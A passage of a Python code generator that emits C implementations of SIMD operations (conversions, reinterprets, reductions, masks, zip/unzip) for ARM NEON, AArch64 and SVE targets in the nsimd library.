'''return nsimd_{op}_neon128_f32({in0}.v0) {binop}
nsimd_{op}_neon128_f32({in0}.v1);'''. \
format(op=op, binop=binop, **fmtspec)
elif typ == 'f64':
return 'return {in0}.v0 {binop} {in0}.v1;'. \
format(binop=binop, **fmtspec)
else:
return 'return ' + \
binop.join(['vgetq_lane_u{typnbits}({in0}, {i})'. \
format(i=i, **fmtspec) \
for i in range(0, 128 // int(fmtspec['typnbits']))]) + \
';'
elif simd_ext == 'aarch64':
armop = {'all': 'min', 'any': 'max'}
normal = 'return v{armop}vq_u{typnbits}({in0}) != 0;'. \
format(armop=armop[op], **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
return nsimd_{op}_aarch64_f32({in0}.v0) {binop}
nsimd_{op}_aarch64_f32({in0}.v1);
#endif'''.format(normal=normal, op=op, binop=binop, **fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return \
'return v{armop}vq_u32(vreinterpretq_u32_u64({in0})) != 0;'. \
format(armop=armop[op], **fmtspec)
else:
return normal
elif simd_ext in sve:
if op == 'any':
operand= convert_to_predicate(opts, '{in0}'.format(**fmtspec))
return '''return svptest_any({svtrue}, {operand});'''. \
format(operand=operand, **fmtspec)
else:
operand='svnot_z({svtrue}, {op})'. \
format(op=convert_to_predicate(opts, '{in0}'.format(**fmtspec)),
**fmtspec)
return '''return !svptest_any({svtrue}, {operand});'''. \
format(operand=operand, **fmtspec)
# -----------------------------------------------------------------------------
# nbtrue
def nbtrue1(opts, simd_ext, typ):
if simd_ext == 'neon128':
if typ == 'f16':
return \
'''return nsimd_nbtrue_neon128_f32({in0}.v0) +
nsimd_nbtrue_neon128_f32({in0}.v1);'''. \
format(**fmtspec)
elif typ == 'f64':
return 'return -(int)((i64){in0}.v0 + (i64){in0}.v1);'. \
format(**fmtspec)
else:
return \
'''nsimd_neon128_vi{typnbits} temp =
vreinterpretq_s{typnbits}_u{typnbits}({in0});
return -(int)('''.format(**fmtspec) + \
'+'.join(['vgetq_lane_s{typnbits}(temp, {i})'. \
format(i=i, **fmtspec) \
for i in range(0, 128 // int(fmtspec['typnbits']))]) + \
');'
elif simd_ext == 'aarch64':
normal = \
'''return -(int)vaddvq_s{typnbits}(
vreinterpretq_s{typnbits}_u{typnbits}({in0}));'''. \
format(**fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
return nsimd_nbtrue_aarch64_f32({in0}.v0) +
nsimd_nbtrue_aarch64_f32({in0}.v1);
#endif'''.format(normal=normal, **fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return \
'''return -(vaddvq_s32(vreinterpretq_s32_u64({in0})) >> 1);'''. \
format(**fmtspec)
else:
return normal
elif simd_ext in sve:
return 'return (int)svcntp_b{typnbits}({svtrue}, {op});'. \
format(op=convert_to_predicate(opts, '{in0}'.format(**fmtspec)),
**fmtspec)
# -----------------------------------------------------------------------------
# Reinterpret logical
def reinterpretl1(simd_ext, from_typ, to_typ):
if from_typ == to_typ or simd_ext in sve:
return 'return {in0};'.format(**fmtspec)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vlf16 ret;
u32 buf[4];
buf[0] = (vgetq_lane_u16({in0}, 0) ? (u32)-1 : 0);
buf[1] = (vgetq_lane_u16({in0}, 1) ? (u32)-1 : 0);
buf[2] = (vgetq_lane_u16({in0}, 2) ? (u32)-1 : 0);
buf[3] = (vgetq_lane_u16({in0}, 3) ? (u32)-1 : 0);
ret.v0 = vld1q_u32(buf);
buf[0] = (vgetq_lane_u16({in0}, 4) ? (u32)-1 : 0);
buf[1] = (vgetq_lane_u16({in0}, 5) ? (u32)-1 : 0);
buf[2] = (vgetq_lane_u16({in0}, 6) ? (u32)-1 : 0);
buf[3] = (vgetq_lane_u16({in0}, 7) ? (u32)-1 : 0);
ret.v1 = vld1q_u32(buf);
return ret;'''.format(**fmtspec)
from_f16_with_f32 = \
'''u16 buf[8];
buf[0] = (vgetq_lane_u32({in0}.v0, 0) ? (u16)-1 : 0);
buf[1] = (vgetq_lane_u32({in0}.v0, 1) ? (u16)-1 : 0);
buf[2] = (vgetq_lane_u32({in0}.v0, 2) ? (u16)-1 : 0);
buf[3] = (vgetq_lane_u32({in0}.v0, 3) ? (u16)-1 : 0);
buf[4] = (vgetq_lane_u32({in0}.v1, 0) ? (u16)-1 : 0);
buf[5] = (vgetq_lane_u32({in0}.v1, 1) ? (u16)-1 : 0);
buf[6] = (vgetq_lane_u32({in0}.v1, 2) ? (u16)-1 : 0);
buf[7] = (vgetq_lane_u32({in0}.v1, 3) ? (u16)-1 : 0);
return vld1q_u16(buf);'''.format(**fmtspec)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = vgetq_lane_u64({in0}, 0);
ret.v1 = vgetq_lane_u64({in0}, 1);
return ret;'''.format(**fmtspec)
elif from_typ == 'f64':
return '''u64 buf[2];
buf[0] = {in0}.v0;
buf[1] = {in0}.v1;
return vld1q_u64(buf);'''.format(**fmtspec)
else:
return 'return {in0};'.format(**fmtspec)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return {in0};
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return {in0};
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec)
else:
return 'return {in0};'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Convert
def convert1(simd_ext, from_typ, to_typ):
fmtspec2 = fmtspec.copy()
fmtspec2['to_suf'] = suf(to_typ)
fmtspec2['from_suf'] = suf(from_typ)
if from_typ == to_typ:
return 'return {in0};'.format(**fmtspec)
if from_typ in common.iutypes and to_typ in common.iutypes:
if simd_ext in neon:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
else:
return 'return svreinterpret_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
if simd_ext in sve:
return 'return svcvt_{to_suf}_{from_suf}_x({svtrue}, {in0});'. \
format(**fmtspec2)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = (f32)vgetq_lane_{from_suf}({in0}, 0);
buf[1] = (f32)vgetq_lane_{from_suf}({in0}, 1);
buf[2] = (f32)vgetq_lane_{from_suf}({in0}, 2);
buf[3] = (f32)vgetq_lane_{from_suf}({in0}, 3);
ret.v0 = vld1q_f32(buf);
buf[0] = (f32)vgetq_lane_{from_suf}({in0}, 4);
buf[1] = (f32)vgetq_lane_{from_suf}({in0}, 5);
buf[2] = (f32)vgetq_lane_{from_suf}({in0}, 6);
buf[3] = (f32)vgetq_lane_{from_suf}({in0}, 7);
ret.v1 = vld1q_f32(buf);
return ret;'''.format(**fmtspec2)
from_f16_with_f32 = \
'''{to_typ} buf[8];
buf[0] = ({to_typ})vgetq_lane_f32({in0}.v0, 0);
buf[1] = ({to_typ})vgetq_lane_f32({in0}.v0, 1);
buf[2] = ({to_typ})vgetq_lane_f32({in0}.v0, 2);
buf[3] = ({to_typ})vgetq_lane_f32({in0}.v0, 3);
buf[4] = ({to_typ})vgetq_lane_f32({in0}.v1, 0);
buf[5] = ({to_typ})vgetq_lane_f32({in0}.v1, 1);
buf[6] = ({to_typ})vgetq_lane_f32({in0}.v1, 2);
buf[7] = ({to_typ})vgetq_lane_f32({in0}.v1, 3);
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = (f64)vgetq_lane_{from_suf}({in0}, 0);
ret.v1 = (f64)vgetq_lane_{from_suf}({in0}, 1);
return ret;'''.format(**fmtspec2)
elif from_typ == 'f64':
return '''{to_typ} buf[2];
buf[0] = ({to_typ}){in0}.v0;
buf[1] = ({to_typ}){in0}.v1;
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
else:
return 'return vcvtq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcvtq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec2)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcvtq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec2)
else:
return 'return vcvtq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
# -----------------------------------------------------------------------------
# Reinterpret
def reinterpret1(simd_ext, from_typ, to_typ):
fmtspec2 = fmtspec.copy()
fmtspec2['to_suf'] = suf(to_typ)
fmtspec2['from_suf'] = suf(from_typ)
if from_typ == to_typ:
return 'return {in0};'.format(**fmtspec)
if simd_ext in sve:
return 'return svreinterpret_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
to_f16_with_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 0));
buf[1] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 1));
buf[2] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 2));
buf[3] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 3));
ret.v0 = vld1q_f32(buf);
buf[0] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 4));
buf[1] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 5));
buf[2] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 6));
buf[3] = nsimd_u16_to_f32((u16)vgetq_lane_{from_suf}({in0}, 7));
ret.v1 = vld1q_f32(buf);
return ret;'''.format(**fmtspec2)
from_f16_with_f32 = \
'''{to_typ} buf[8];
buf[0] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 0));
buf[1] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 1));
buf[2] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 2));
buf[3] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v0, 3));
buf[4] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 0));
buf[5] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 1));
buf[6] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 2));
buf[7] = ({to_typ})nsimd_f32_to_u16(vgetq_lane_f32({in0}.v1, 3));
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
if simd_ext == 'neon128':
if to_typ == 'f16':
return to_f16_with_f32
elif from_typ == 'f16':
return from_f16_with_f32
elif to_typ == 'f64':
return '''nsimd_neon128_vf64 ret;
union {{ f64 to; {from_typ} from; }} buf;
buf.from = vgetq_lane_{from_suf}({in0}, 0);
ret.v0 = buf.to;
buf.from = vgetq_lane_{from_suf}({in0}, 1);
ret.v1 = buf.to;
return ret;'''.format(**fmtspec2)
elif from_typ == 'f64':
return '''union {{ f64 from; {to_typ} to; }} buf_;
{to_typ} buf[2];
buf_.from = {in0}.v0;
buf[0] = buf_.to;
buf_.from = {in0}.v1;
buf[1] = buf_.to;
return vld1q_{to_suf}(buf);'''.format(**fmtspec2)
else:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
elif simd_ext == 'aarch64':
if to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vreinterpretq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=to_f16_with_f32, **fmtspec2)
elif from_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vreinterpretq_{to_suf}_{from_suf}({in0});
#else
{using_f32}
#endif'''.format(using_f32=from_f16_with_f32, **fmtspec2)
else:
return 'return vreinterpretq_{to_suf}_{from_suf}({in0});'. \
format(**fmtspec2)
# -----------------------------------------------------------------------------
# reverse
def reverse1(simd_ext, typ):
armtyp = suf(typ)
if simd_ext in sve:
return '''return svrev_{suf}( {in0} );'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}.v1;
ret.v1 = {in0}.v0;
return ret;'''.format(**fmtspec)
elif typ in [ 'i64', 'u64', 'f64' ]:
return '''return vcombine_{armtyp}(vget_high_{armtyp}({in0}),
vget_low_{armtyp}({in0}));'''. \
format(armtyp=armtyp, **fmtspec)
elif typ == 'f16':
return '''nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_reverse_{simd_ext}_f32(a0.v1);
ret.v1 = nsimd_reverse_{simd_ext}_f32(a0.v0);
return ret;'''.format(**fmtspec)
else:
return '''{in0} = vrev64q_{armtyp}({in0});
return vcombine_{armtyp}(vget_high_{armtyp}({in0}),
vget_low_{armtyp}({in0}));'''. \
format(armtyp=armtyp, **fmtspec)
# -----------------------------------------------------------------------------
# Horizontal sum
def addv(simd_ext, typ):
if simd_ext == 'neon128':
if typ == 'f64':
return 'return ({typ})({in0}.v0 + {in0}.v1);'.format(**fmtspec)
elif typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 3));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 0));
return vget_lane_{suf}(tmp, 0);
#else
float32x2_t tmp0 = vadd_f32(vget_low_f32({in0}.v0),
vget_high_f32({in0}.v0));
tmp0 = vadd_f32(tmp0, vext_f32(tmp0, tmp0, 1));
float32x2_t tmp1 = vadd_f32(vget_low_f32({in0}.v1),
vget_high_f32({in0}.v1));
tmp1 = vadd_f32(tmp1, vext_f32(tmp1, tmp1, 1));
return nsimd_f32_to_f16(vget_lane_f32(tmp0, 0) +
vget_lane_f32(tmp1, 0));
#endif''' .format(t=half_neon64_typ(typ), **fmtspec)
elif typ == 'f32':
return \
'''{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 1));
return vget_lane_{suf}(tmp, 0);'''. \
format(t=half_neon64_typ(typ), **fmtspec)
elif typ[0] in ['i', 'u']:
le = 128 // int(typ[1:]);
return \
'''{typ} res = ({typ})0;
{typ} buf[{le}];
vst1q_{suf}(buf, {in0});
for (int i = 0; i < {le}; i++) {{
res += buf[i];
}}
return res;'''. \
format(le=le, **fmtspec)
elif simd_ext == 'aarch64':
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{t} tmp = vadd_{suf}(vget_low_{suf}({in0}),
vget_high_{suf}({in0}));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 3));
tmp = vadd_{suf}(tmp, vext_{suf}(tmp, tmp, 0));
return vget_lane_{suf}(tmp, 0);
#else
float32x2_t tmp0 = vadd_f32(vget_low_f32({in0}.v0),
vget_high_f32({in0}.v0));
tmp0 = vadd_f32(tmp0, vext_f32(tmp0, tmp0, 1));
float32x2_t tmp1 = vadd_f32(vget_low_f32({in0}.v1),
vget_high_f32({in0}.v1));
tmp1 = vadd_f32(tmp1, vext_f32(tmp1, tmp1, 1));
return nsimd_f32_to_f16(vget_lane_f32(tmp0, 0) +
vget_lane_f32(tmp1, 0));
#endif''' .format(t=half_neon64_typ(typ), **fmtspec)
elif typ in ['f32', 'f64']:
return 'return vaddvq_{suf}({in0});'.format(**fmtspec)
elif simd_ext in sve:
return 'return svaddv_{suf}({svtrue}, {in0});' .format(**fmtspec)
# -----------------------------------------------------------------------------
# Up convert
def upcvt1(simd_ext, from_typ, to_typ):
# For integer upcast, due to 2's complement representation
# _s : signed -> bigger signed
# _s : signed -> bigger unsigned
# _u : unsigned -> bigger signed
# _u : unsigned -> bigger unsigned
if simd_ext in neon:
if from_typ == 'f16' and to_typ == 'f32':
return \
'''#ifdef NSIMD_ARM_FP16
nsimd_{simd_ext}_vf32x2 ret;
ret.v0 = vcvt_f32_f16(vget_low_{suf}({in0}));
ret.v1 = vcvt_f32_f16(vget_high_{suf}({in0}));
return ret;
#else
nsimd_{simd_ext}_vf32x2 ret;
ret.v0 = {in0}.v0;
ret.v1 = {in0}.v1;
return ret;
#endif'''.format(**fmtspec)
elif from_typ == 'f32' and to_typ == 'f64':
if simd_ext == 'neon128':
return \
'''nsimd_neon128_vf64x2 ret;
f32 buf[4];
vst1q_f32(buf, {in0});
ret.v0.v0 = (f64)buf[0];
ret.v0.v1 = (f64)buf[1];
ret.v1.v0 = (f64)buf[2];
ret.v1.v1 = (f64)buf[3];
return ret;'''.format(**fmtspec)
else:
return \
'''nsimd_aarch64_vf64x2 ret;
ret.v0 = vcvt_f64_f32(vget_low_{suf}({in0}));
ret.v1 = vcvt_f64_f32(vget_high_{suf}({in0}));
return ret;'''.format(**fmtspec)
elif (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = vmovl_{suf}(vget_low_{suf}({in0}));
ret.v1 = vmovl_{suf}(vget_high_{suf}({in0}));
return ret;'''.format(**fmtspec)
elif (from_typ in common.itypes and to_typ in common.utypes) or \
(from_typ in common.utypes and to_typ in common.itypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = vreinterpretq_{suf_to_typ}_{suf_int_typ}(
vmovl_{suf}(vget_low_{suf}({in0})));
ret.v1 = vreinterpretq_{suf_to_typ}_{suf_int_typ}(
vmovl_{suf}(vget_high_{suf}({in0})));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]),
**fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
nsimd_{simd_ext}_v{int_typ}x2 tmp;
tmp = nsimd_upcvt_{simd_ext}_{int_typ}_{from_typ}({in0});
ret.v0 = nsimd_cvt_{simd_ext}_{to_typ}_{int_typ}(tmp.v0);
ret.v1 = nsimd_cvt_{simd_ext}_{to_typ}_{int_typ}(tmp.v1);
return ret;'''. \
format(int_typ=from_typ[0] + to_typ[1:], **fmtspec)
# Getting here means that we deal with SVE
if (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svunpklo_{suf_to_typ}({in0});
ret.v1 = svunpkhi_{suf_to_typ}({in0});
return ret;'''.format(suf_to_typ=suf(to_typ), **fmtspec)
elif (from_typ in common.itypes and to_typ in common.utypes) or \
(from_typ in common.utypes and to_typ in common.itypes):
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svreinterpret_{suf_to_typ}_{suf_int_typ}(
svunpklo_{suf_int_typ}({in0}));
ret.v1 = svreinterpret_{suf_to_typ}_{suf_int_typ}(
svunpkhi_{suf_int_typ}({in0}));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]), **fmtspec)
elif from_typ in common.iutypes and to_typ in common.ftypes:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svcvt_{suf_to_typ}_{suf_int_typ}_x(
{svtrue}, svunpklo_{suf_int_typ}({in0}));
ret.v1 = svcvt_{suf_to_typ}_{suf_int_typ}_x(
{svtrue}, svunpkhi_{suf_int_typ}({in0}));
return ret;'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(from_typ[0] + to_typ[1:]), **fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{to_typ}x2 ret;
ret.v0 = svcvt_{suf_to_typ}_{suf}_x({svtrue}, svzip1_{suf}(
{in0}, {in0}));
ret.v1 = svcvt_{suf_to_typ}_{suf}_x({svtrue}, svzip2_{suf}(
{in0}, {in0}));
return ret;'''.format(suf_to_typ=suf(to_typ), **fmtspec)
# -----------------------------------------------------------------------------
# Down convert
def downcvt1(simd_ext, from_typ, to_typ):
if simd_ext in neon:
if from_typ == 'f64' and to_typ == 'f32':
if simd_ext == 'neon128':
return '''f32 buf[4];
buf[0] = (f32){in0}.v0;
buf[1] = (f32){in0}.v1;
buf[2] = (f32){in1}.v0;
buf[3] = (f32){in1}.v1;
return vld1q_f32(buf);'''.format(**fmtspec)
else:
return '''return vcombine_f32(vcvt_f32_f64({in0}),
vcvt_f32_f64({in1}));'''. \
format(**fmtspec)
elif from_typ == 'f32' and to_typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vcombine_f16(vcvt_f16_f32({in0}),
vcvt_f16_f32({in1}));
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = {in0};
ret.v1 = {in1};
return ret;
#endif'''.format(**fmtspec)
elif (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''return vcombine_{suf_to_typ}(vmovn_{suf}({in0}),
vmovn_{suf}({in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
elif (from_typ in common.itypes and to_typ in common.itypes) or \
(from_typ in common.utypes and to_typ in common.utypes):
return '''return vreinterpretq_{suf_to_typ}(
vcombine_{suf_to_typ}(vmovn_{suf}({in0}),
vmovn_{suf}({in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
else:
return \
'''return nsimd_downcvt_{simd_ext}_{to_typ}_{int_typ}(
nsimd_cvt_{simd_ext}_{int_typ}_{from_typ}({in0}),
nsimd_cvt_{simd_ext}_{int_typ}_{from_typ}({in1}));'''.\
format(int_typ=to_typ[0] + from_typ[1:], **fmtspec)
# Getting here means that we deal with SVE
if from_typ in common.iutypes and to_typ in common.iutypes:
return '''return svuzp1_{suf_to_typ}(
svreinterpret_{suf_to_typ}_{suf}({in0}),
svreinterpret_{suf_to_typ}_{suf}({in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
elif from_typ in common.ftypes and to_typ in common.iutypes:
return \
'''return svuzp1_{suf_to_typ}(svreinterpret_{suf_to_typ}_{suf_int_typ}(
svcvt_{suf_int_typ}_{suf}_x({svtrue}, {in0})),
svreinterpret_{suf_to_typ}_{suf_int_typ}(
svcvt_{suf_int_typ}_{suf}_x({svtrue}, {in1})));'''. \
format(suf_to_typ=suf(to_typ),
suf_int_typ=suf(to_typ[0] + from_typ[1:]),
**fmtspec)
else:
return \
'''return svuzp1_{suf_to_typ}(svcvt_{suf_to_typ}_{suf}_x(
{svtrue}, {in0}), svcvt_{suf_to_typ}_{suf}_x(
{svtrue}, {in1}));'''. \
format(suf_to_typ=suf(to_typ), **fmtspec)
# -----------------------------------------------------------------------------
# adds
def adds(simd_ext, from_typ):
if from_typ in common.ftypes:
return 'return nsimd_add_{simd_ext}_{from_typ}({in0}, {in1});'. \
format(**fmtspec)
if simd_ext in neon:
return 'return vqaddq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svqadd_{suf}({in0}, {in1});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# subs
def subs(simd_ext, from_typ):
if from_typ in common.ftypes:
return 'return nsimd_sub_{simd_ext}_{from_typ}({in0}, {in1});'. \
format(**fmtspec)
elif simd_ext in neon:
return 'return vqsubq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svqsub_{suf}({in0}, {in1});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# to_mask
def to_mask1(opts, simd_ext, typ):
if typ in common.itypes + common.ftypes:
normal = 'return vreinterpretq_{suf}_u{typnbits}({in0});'. \
format(**fmtspec)
else:
normal = 'return {in0};'.format(**fmtspec)
emulate_f16 = '''nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_to_mask_{simd_ext}_f32({in0}.v0);
ret.v1 = nsimd_to_mask_{simd_ext}_f32({in0}.v1);
return ret;'''.format(**fmtspec)
if simd_ext == 'neon128' and typ == 'f16':
return emulate_f16
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = nsimd_scalar_reinterpret_f64_u64({in0}.v0);
ret.v1 = nsimd_scalar_reinterpret_f64_u64({in0}.v1);
return ret;'''.format(**fmtspec)
elif simd_ext == 'aarch64' and typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
{emulate_f16}
#endif'''.format(normal=normal, emulate_f16=emulate_f16)
elif simd_ext in sve:
if opts.sve_emulate_bool:
return 'return svreinterpret_{suf}_u{typnbits}({in0});'. \
format(**fmtspec)
else:
utyp = 'u{}'.format(fmtspec['typnbits'])
return '''return svreinterpret_{suf}_{utyp}(svsel_{utyp}(
{in0}, svdup_n_{utyp}(({utyp})-1),
svdup_n_{utyp}(({utyp})0)));'''. \
format(utyp=utyp, **fmtspec)
else:
return normal
# -----------------------------------------------------------------------------
# iota
def iota(simd_ext, typ):
if simd_ext in sve:
if typ in common.iutypes:
return 'return svindex_{suf}(0, 1);'.format(**fmtspec)
else:
return \
'''return svcvt_{suf}_s{typnbits}_x({svtrue},
svindex_s{typnbits}(0, 1));'''.format(**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
ret.v0 = 0.0;
ret.v1 = 1.0;
return ret;'''.format(**fmtspec)
typ2 = 'f32' if typ == 'f16' else typ
le = 128 // int(typ[1:])
iota = ', '.join(['({typ2}){i}'.format(typ2=typ2, i=i) \
for i in range(le)])
normal = '''{typ} buf[{le}] = {{ {iota} }};
return vld1q_{suf}(buf);'''. \
format(le=le, iota=iota, **fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[8] = {{ {iota} }};
nsimd_{simd_ext}_vf16 ret;
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''.format(iota=iota, normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# mask_for_loop_tail
def mask_for_loop_tail(simd_ext, typ):
if typ == 'f16':
threshold = 'nsimd_f32_to_f16((f32)({in1} - {in0}))'.format(**fmtspec)
else:
threshold = '({typ})({in1} - {in0})'.format(**fmtspec)
if simd_ext == 'sve':
le = 'nsimd_len_sve_{typ}()'.format(**fmtspec)
elif simd_ext in fixed_sized_sve:
le = int(simd_ext[3:]) // int(typ[1:])
else:
le = 128 // int(typ[1:])
return '''if ({in0} >= {in1}) {{
return nsimd_set1l_{simd_ext}_{typ}(0);
}}
if ({in1} - {in0} < {le}) {{
nsimd_{simd_ext}_v{typ} n =
nsimd_set1_{simd_ext}_{typ}({threshold});
return nsimd_lt_{simd_ext}_{typ}(
nsimd_iota_{simd_ext}_{typ}(), n);
}} else {{
return nsimd_set1l_{simd_ext}_{typ}(1);
}}'''.format(le=le, threshold=threshold, **fmtspec)
# -----------------------------------------------------------------------------
# to_logical
def to_logical1(opts, simd_ext, typ):
if typ in common.iutypes:
return '''return nsimd_ne_{simd_ext}_{typ}({in0},
nsimd_set1_{simd_ext}_{typ}(({typ})0));'''. \
format(**fmtspec)
normal_fp = \
'''return nsimd_reinterpretl_{simd_ext}_{suf}_{utyp}(
nsimd_ne_{simd_ext}_{utyp}(
nsimd_reinterpret_{simd_ext}_{utyp}_{typ}(
{in0}), nsimd_set1_{simd_ext}_{utyp}(({utyp})0)));'''. \
format(utyp='u{}'.format(fmtspec['typnbits']), **fmtspec)
if typ in ['f32', 'f64'] or (typ == 'f16' and simd_ext in sve):
return normal_fp
emulate_fp16 = \
'''nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_to_logical_{simd_ext}_f32({in0}.v0);
ret.v1 = nsimd_to_logical_{simd_ext}_f32({in0}.v1);
return ret;'''.format(**fmtspec)
if simd_ext == 'aarch64':
return '''#ifdef NSIMD_ARM_FP16
{normal_fp}
#else
{emulate_fp16}
#endif'''.format(normal_fp=normal_fp,
emulate_fp16=emulate_fp16)
elif simd_ext == 'neon128':
return emulate_fp16
# -----------------------------------------------------------------------------
# unpack functions
def zip_unzip_half(func, simd_ext, typ):
if simd_ext == 'aarch64' or simd_ext in sve:
if typ =='f16' and simd_ext == 'aarch64':
if func in ['zip1', 'zip2']:
return '''\
#ifdef NSIMD_ARM_FP16
return {s}v{op}{q}_{suf}({in0}, {in1});
#else
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {s}vzip1{q}_f32({in0}.v{i}, {in1}.v{i});
ret.v1 = {s}vzip2{q}_f32({in0}.v{i}, {in1}.v{i});
return ret;
#endif
'''.format(op=func,
i = '0' if func in ['zip1', 'uzp1'] else '1',
s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
else:
return '''\
#ifdef NSIMD_ARM_FP16
return {s}v{op}{q}_{suf}({in0}, {in1});
#else
nsimd_{simd_ext}_v{typ} ret;
ret.v0 = {s}v{func}{q}_f32({in0}.v0, {in0}.v1);
ret.v1 = {s}v{func}{q}_f32({in1}.v0, {in1}.v1);
return ret;
#endif'''.format(op=func, func=func,
s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
else:
return 'return {s}v{op}{q}_{suf}({in0}, {in1});'. \
format(op=func, s = 's' if simd_ext in sve else '',
q = '' if simd_ext in sve else 'q', **fmtspec)
elif simd_ext == 'neon128':
